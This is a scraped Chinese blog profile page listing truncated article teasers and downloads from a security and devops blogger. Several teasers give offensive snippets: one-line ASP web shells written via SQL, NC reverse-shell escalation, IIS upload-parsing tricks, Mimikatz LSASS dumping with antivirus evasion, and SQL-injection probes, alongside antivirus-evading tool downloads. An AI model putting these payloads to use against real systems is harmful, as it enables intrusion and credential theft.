自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

冰河的专栏

微信搜一搜【冰河技术】,关注后回复【PDF】领取冰河原创超硬核PDF电子书,海量面试资料和简历模板。

  • 博客(28)
  • 资源 (133)
  • 论坛 (1)
  • 收藏
  • 关注

原创 CentOS之——设置系统时间与网络时间同步

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85476067Linux的时间分为System Clock(系统时间)和Real Time Clock (硬件时间,简称RTC)。系统时间:指当前Linux Kernel中的时间。硬件时间:主板上有电池供电的时间。查看系统时间的命令:#date设置系统时间的命令...

2018-12-31 18:01:34 751

原创 渗透之——ASP Web提权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85475585【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上...

2018-12-31 17:50:30 2953 1

转载 渗透之——NC反弹CMDSHELL提权总结

Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了….1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去2:然后本地执行nc -vv -lp 52进行反弹3:在...

2018-12-31 14:53:52 2492

原创 discuz之——Table 'uc.uc_pms' doesn't exist,uc_pms不存在解决

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85321690第一次安装discuz,安装成功后跳到首页,报如下错误:Error:Table 'ucenter.uc_pms' doesn't existErrno:1146SQL::SELECT count(*) FROM `ucenter`.uc_pms WHER...

2018-12-28 14:35:56 561 1

原创 渗透之——SQL语句生成一句话

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/852968801、SQLServer执行SQL语句生成一句话select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_m...

2018-12-27 18:19:45 2215

原创 渗透之——Windows远程登录提示超出允许最大连接数解决方案

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85225422当我们拿下一台服务器,用mstsc命令开启远程终端连接服务器时,有时会提示“超出允许最大连接数”,此时,不要慌,这里,我们用以下命令格式:mstsc /admin /v:目标ip:端口再次连接,问题解决。 ...

2018-12-23 19:38:54 654

转载 IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

[+]IIS 6.0目录解析:/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件名)IIS6.0 都会把此类后缀文件成功解析为 asp 文件。(站长评论:IIS6.0解析漏洞的...

2018-12-22 15:51:45 599

原创 渗透之——DEDE5.7初始化数据体验包获取失败/无法下载安装

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85175638先去织梦官方网站下载 dedecms 5.7安装初始化数据体验包,如果是gbk则下载http://www.dedecms.com/demodata/dedev56demo.zipUTF-8下载http://www.dedecms.com/demodata/de...

2018-12-21 21:58:45 1049

转载 渗透之——利用procdump+Mimikatz 绕过杀软获取Windows明文密码

Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对...

2018-12-19 22:26:29 1904

原创 Hydra之——安装Libssh模块

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85107034当我们使用hydra来探测远程ssh服务口令是否强壮时,如果没有安装libssh模块,程序会给出如下一个错误:[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!...

2018-12-19 20:02:22 2834

原创 ASP连接MSSQL数据库语句

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85066490ASP与MSSQL 2012  企业版连接字符串ConnStr="Provider=SQLOLEDB;Data Source=127.0.0.1;Initial Catalog=westrac;User Id=sa;Pwd=ssddddHzx;"ASP与...

2018-12-18 15:26:57 2006

原创 解决windws 2003系统上网站不能访问, IIS 403 404问题

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85020093IS不能访问的问题:问题本机访问IIS只能访问HTML文件等一系列静态文件.如访问ASP或ASPX文件IIS就会在IE上报错提示说404错误,说文件无法找到。别的机器来访问服务器提示403错误。解决方案IIS不能访问ASPX文件有两种可能。一是...

2018-12-16 00:32:32 2801

原创 HTTP 错误 403.1 - 禁止访问:执行访问被拒绝

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85020086今天,在搭建渗透测试环境的时候,使用WIN2003 INTERNET信息服务(IIS)管理器,在建立一个网站虚拟目录,结果浏览网页时出现错误,错误提示信息如下:该页无法显示您试图从目录中执行 CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序。...

2018-12-16 00:27:28 9578 1

转载 渗透之——十大渗透测试演练系统

DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。链接地址:http://www.dvwa.co.uk  mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应...

2018-12-15 17:54:14 1134

转载 渗透之——PsExec下载地址及其用法

PsExec下载地址   PSTools.ziphttp://technet.microsoft.com/en-us/sysinternals/bb897553.aspxUsing PsExec See the July 2004 issue of Windows IT Pro Magazine for Mark's article that covers advanced usa...

2018-12-14 09:45:55 1258

转载 渗透之——iis7.5加fck解析漏洞后台拿shell

IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析这次讲的是IIS7.5解析漏洞,http://www.xxoo.com/fckeditor/editor/fckeditor.html上传图片,浏览,上传一个aspx的图片一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg也可上传asp的图片马...

2018-12-11 22:48:47 2693

原创 渗透之——asp图片木马的制作和使用

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588主要亮点:图片木马(可以正常打开显示的木马)先看代码:仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。1、找一张图片,名字改成1.jpg2、<%eval request(“a”)%>存为1.asp(就是一句话木马)3、copy ...

2018-12-11 18:22:46 7530 5

转载 渗透之——网站入侵思路

网站入侵思路(初级黑客渗透篇)    1,〓经典注入〓     通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点    2,〓万能密码OR漏洞〓    万能密码'or'='or',可以用...

2018-12-10 23:20:46 3222

原创 XP IIS之——问题总结

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84933732一、提示:您要访问的网页有问题,无法显示的问题xp下安装iis,提示:您要访问的网页有问题,无法显示 的问题的完美解决方法 装完后一浏览ASP文件就显示无法显示网页您要访问的网页有问题,无法显示。-----------------------...

2018-12-09 23:15:51 179

原创 渗透之——SQLMap参数说明

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84930014Options(选项)--version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1)Target(目标)以下至少需要设置其中一个选项,设置目标URL。-d DI...

2018-12-09 18:07:35 314

原创 渗透之——SQL注入点检测方法

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84929699现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。特此共享一下。现在假设有一个新闻页面,URL 是 http://192.168...

2018-12-09 17:19:39 9948 3

原创 渗透之——SQLMap用法总结

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84929238一、参数说明-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p "page,id") -D "" #指定数据库名 -T "" #指定表名 -C "" #指定字段...

2018-12-09 16:45:36 1422

原创 渗透之——SQLMap的用法+谷歌黑客语法

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84927643SQLMap的用法记录******************基本步骤***************sqlmap.py -u "http://192.168.109.139/news?id=1" --current-user #获取当前用户名称sqlmap...

2018-12-09 14:08:46 3264

转载 msfvenom之——生成各类Payload命令

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y...

2018-12-08 18:00:01 959

原创 kali之——安装免杀工具Veil-Evasion

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84895163Veil Evasion简介Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。免责声明:本教程目的只是为了教育,我们不对这些东西会如何使用担任何风险,使用它的后果自负。Veil-Evasion被...

2018-12-08 17:51:27 7318 2

转载 VMWare之——在vmware里面免费安装纯净的xp虚拟机

1. 安装vmware, 略2. 下载xphttp://msdn.itellyou.cn/用迅雷下载Windows XP Professional with Service Pack 3 (x86) - CD VL (Chinese-Simplified)下载下来后的名字是zh-hans_windows_xp_professional_with_service_pack_3_x86...

2018-12-07 13:16:48 10749 3

原创 Kali之——设置静态IP

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84747764首先把虚拟机的网络适配器设置成桥接模式:直接连接到物理网络kali安装完成之后,首先确定你是DHCP还是静态IP。DHCP是用来给大型网络动态分配IP的协议,而大部分中小型网络(如校园网、家庭网络)都是采用网络管理员手工分配静态IP的方法来确定IP地址的。一...

2018-12-03 09:46:51 7283 1

转载 渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞

跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~本文破解wifi针对一些路由器的WPS(Wi-fi protected set...

2018-12-01 23:05:24 6429

Docker+K8S+GitLab/SVN+Jenkins+Harbor持续集成yaml安装文件

Docker+K8S+GitLab/SVN+Jenkins+Harbor持续集成yaml安装文件,为避免读者搭建环境过程中出现各种异常情况,冰河特别整理了这份yaml安装文件,一起加油呀~~

2021-05-12

sharding-jdbc之——分库分表实例完整源码

sharding-jdbc之——分库分表实例完整源码,详情请参见博文:http://blog.csdn.net/l1028386804/article/details/79368021

2018-02-25

MySQL各版本my.cnf配置文件.rar

MySQL 5.6、5.7、8.0版本的my.cnf完整配置文件,亲测可用,配置文件中优化了MySQL中的一些默认配置项,能够有效的提高MySQL数据库的并发处理能力!

2020-01-12

Flume采集Nginx日志到Hive.rar

Flume采集Nginx日志到Hive的事务表时需要导入到Flume下的Jar文件,具体使用方式可参见博文:https://blog.csdn.net/l1028386804/article/details/97975539

2019-08-01

史上最简单Android图片轮播效果实现 源码程序

这个Android示例用最简单的方式实现了图片轮播效果,具体实现细节请阅读博文:http://blog.csdn.net/l1028386804/article/details/48049913

2015-08-28

中国象棋游戏源码.rar

中国象棋游戏Java源代码,完整的源码和注释,可直接运行,可直接用作毕业设计,也可作为学习Java语言的小项目

2021-04-26

hydra 一键安装包

Hydra一键安装包,内含脚本,直接运行脚本就可以安装了,由冰河大神亲自整理

2019-01-07

深入理解高并发编程(冰河原创电子书)

全网首个最全的免费开源的高并发电子书,内容涵盖源码分析、基础案例、实战案例、面试和系统架构,内含秒杀系统和分布式锁的完整架构过程,历时半年精打细磨,三个月下载量突破16万,无论是刚工作的初级程序员,还是工作多年的老司机,都值得一看!

2021-04-28

Easy File Sharing Web Server 7.2

Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.

2019-01-15

ActiveMQ实现的消息收发案例

基于ActiveMQ实现简单的消息收发案例 ,详情请参见博文:http://blog.csdn.net/l1028386804/article/details/68969450

2017-04-03

VMWare安装MacOS的unlocker.rar

解锁虚拟机苹果系统选项的批处理工具,解压即可使用,利用此工具就可以在虚拟机上安装macOS系统啦!亲测可用

2019-11-19

nexus-2.11.2-03-bundle.rar

Nexus——搭建Maven私有仓库,参见博文:https://blog.csdn.net/l1028386804/article/details/71037336

2020-06-15

配置Maven私服配置文件setting.xml

配置Maven私服时,需要修改Maven的默认配置文件,此文件已经配置好Maven私服模板,只需要修改IP和对应的端口号即可

2017-11-29

ImmunityDebugger

Immunity Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为强的Python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融合于一体,它还附带了一套高度可定制的纯pythont图形算法,可用于帮助我们绘制出直观的函数体控制流以及函数中的各个基本块。

2019-01-15

PCMan-FTP+溢出脚本

PCMan-FTP+溢出脚本,实战渗透PcMan-FTP,由冰河大神亲自整理奉献

2019-01-17

Android实现锁屏、设置密码、恢复出厂设置示例

通过本示例的学习,初学者可轻松掌握如何获取Android系统管理员的权限

2015-07-22

nginx1.9.7+keepalive1.3.2

nginx1.9.7+keepalive1.3.2,可搭建Nginx可高用集群和自动故障转移

2018-04-26

Android模拟实现检测心率变化的应用源代码

这个应用模拟实现了检测心率变化,详细实现原理请到链接http://blog.csdn.net/l1028386804/article/details/47169025查看

2015-07-31

商城数据库SQL脚本文件.rar

垂直分库后的商城数据库SQL脚本文件,下载可以稍微修改下即可用于项目中,同时,也可以拿来学习商城数据库的架构知识

2020-03-01

Memcached 32bit与64bit安装包

Memcached 32bit与64bit安装包,具体安装请参见博文:http://blog.csdn.net/l1028386804/article/details/61417166

2017-03-11

SQL注入实战

安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。

2018-11-20

Spring与ActiveMQ整合完整案例

Spring与ActiveMQ整合完整案例,详情请参见博文:http://blog.csdn.net/l1028386804/article/details/68979725

2017-04-03

Java操作FastDFS示例代码

Java操作FastDFS示例代码,具体详情请参见博文:http://blog.csdn.net/l1028386804/article/details/71842826

2017-05-13

Android自定义下拉菜单示例

本示例完整实现了自定义下拉菜单的功能,初学者可快速掌握自定义下拉菜单的技巧,有关具体的实现细节请参考博文:http://blog.csdn.net/l1028386804/article/details/48101651

2015-08-30

FastDFS6.06完整安装包

FastDFS完整安装包,安装步骤详见:https://binghe.blog.csdn.net/article/details/108803782

2021-04-13

Servlet3.1规范(中文最终版)

Servlet3.1规范中文最终版,可以参考实现Servlet异步请求与回调机制

2019-09-08

linux库:compat-libstdc++-33-3.2.3-61

compat-libstdc++-33-3.2.3-61.i386.rpm及compat-libstdc++-33-3.2.3-61.x86_64.rpm

2020-04-20

Android断点下载示例

本示例实现了基于Android平台的断点下载功能,通过本示例的学习,可以让Android初学者轻松掌握Android断点下载的知识,代码注释详尽,确实是学习Android网络编程与文件下载的好资料

2015-07-15

nginx+tomcat+memcached集群和负载均衡所有资源包

nginx+tomcat+memcached集群和负载均衡所有资源包,具体集群方法请参见博文:http://blog.csdn.net/l1028386804/article/details/48289765

2015-09-09

MySQL8.0.19安装包

冰河亲自整理的MySQL8.0.19安装包,具体安装步骤参见:https://binghe.blog.csdn.net/article/details/109036011

2021-04-10

免杀端口转发lcx

免杀lcx,下载后尽量不要放在桌面或其他敏感的地方解压,以免被360等杀毒软件恶意封杀,程序本身是没毒的,亲测成功。 

2019-11-04

Navicat For MongoDB 15.0.6

Navicat for MongoDB 15是一款功能十分强大的数据库管理功能类的软件,我们这款软件就是可以在软件中实现数据传输的一个操作,也就是通过这款软件到用户们的数据库就可以自己想要传输的数据进行传输,并且还可以将那些新的数据进行传输到MongoDB中来使用

2020-06-13

freefloatftpserver1.0 漏洞重现

freefloatftpserver1.0 漏洞重现 ,freefloatftpserver1.0安装程序,并冰河大神亲自整理

2019-02-14

Nmap+Zenmap+Amap+Zmap神器说明

Nmap+Zenmap+Amap+Zmap神器说明,带你全面了解Nmap+Zenmap+Amap+Zmap神器操作,由安全大神冰河亲自实测验证并整理

2018-11-18

sqoop1.46和1.47

sqoop框架开发工具使用的jar,目前版本有1.4.6和1.4.7两个jar包,启动Sqoop时,抛出异常:Error: Could not find or load main class .usr.local.sqoop-1.4.7.sqoop-1.4.7.jar 则可以下载资源将sqoop-1.4.7.jar放到sqoop的lib目录下重新启动,问题解决

2018-09-12

FastDFS集群的配置文件

FastDFS集群的配置文件,详情请参见博文:http://blog.csdn.net/l1028386804/article/details/72803681

2017-05-29

自定义TextView示例

通过本示例,初学者可以迅速掌握Android中自定义控件的流程和方法

2015-07-27

Linux RTL8111/8168B PCI EXPRESS 网卡驱动

Linux 版本的RTL8111/8168B PCI EXPRESS网卡驱动。。。

2017-10-17

Keepalived + Nginx 实现高可用 Web 负载均衡配置文件

Keepalived + Nginx 实现高可用 Web 负载均衡配置文件,具体详情参见博文:http://blog.csdn.net/l1028386804/article/details/72801492

2017-05-29

SQL漏洞测试平台

SQL漏洞测试平台,安装WAMP,然后项目部署在WAMP_HOME\apache2\htdocs下,即可。可作为SQL注入漏洞的入门平台

2018-11-19

冰 河的留言板

发表于 2020-01-02 最后回复 2020-06-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除